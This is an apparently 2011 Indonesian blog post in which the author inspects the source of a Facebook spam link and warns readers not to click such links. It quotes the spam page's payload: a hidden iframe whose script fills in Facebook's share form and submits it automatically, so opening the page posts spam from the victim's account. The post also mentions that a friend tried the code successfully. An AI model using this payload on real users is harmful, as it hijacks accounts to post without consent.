kemarin (29/03/2011) saya mendapati timeline FB banyak banget status-status spam. salah satu contohnya “hiks hiks hiks abis dari sini [link] keren banget” karena udah curiga kalau itu link spam gak jadi saya klik deh. :D Tapi saya  penasaran banget gimana caranya link itu bekerja. jadi saya buka di browser baru yang mana belum login FB dan hanya mengandalkan “view page source” akhirnya keliatan biang keroknya. kodenya adalah

<iframe id="spammer" class="mce-object" style="display: none;" title="&lt;script&gt;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&amp;user_message_prompt'&lt;img src=" width="20" height="20" data-wp-preserve="%3Cscript%3Ewindow.onload%3Dfunction()%7Bdocument.forms%5B0%5D.message.value%3D'kata2%20spam%20disini'%3Bdocument.forms%5B0%5D.submit()%3B%7D%3C%2Fscript%3E" data-mce-resize="false" data-mce-placeholder="1">"&gt;</iframe>

disitu keliatan kalau setelah fungsi share itu dijalankan, langsung menjalankan submit. jadi ya jelas kalau cuma buka aja langsung ngeshare ke FB. makanya buat yang udah kena jangan asal klik sembarangan atau minimal coba dibrowser lain dulu.

PS: say sendiri malah belum nyoba code itu tapi ada teman yang sukses nyobain. hahaha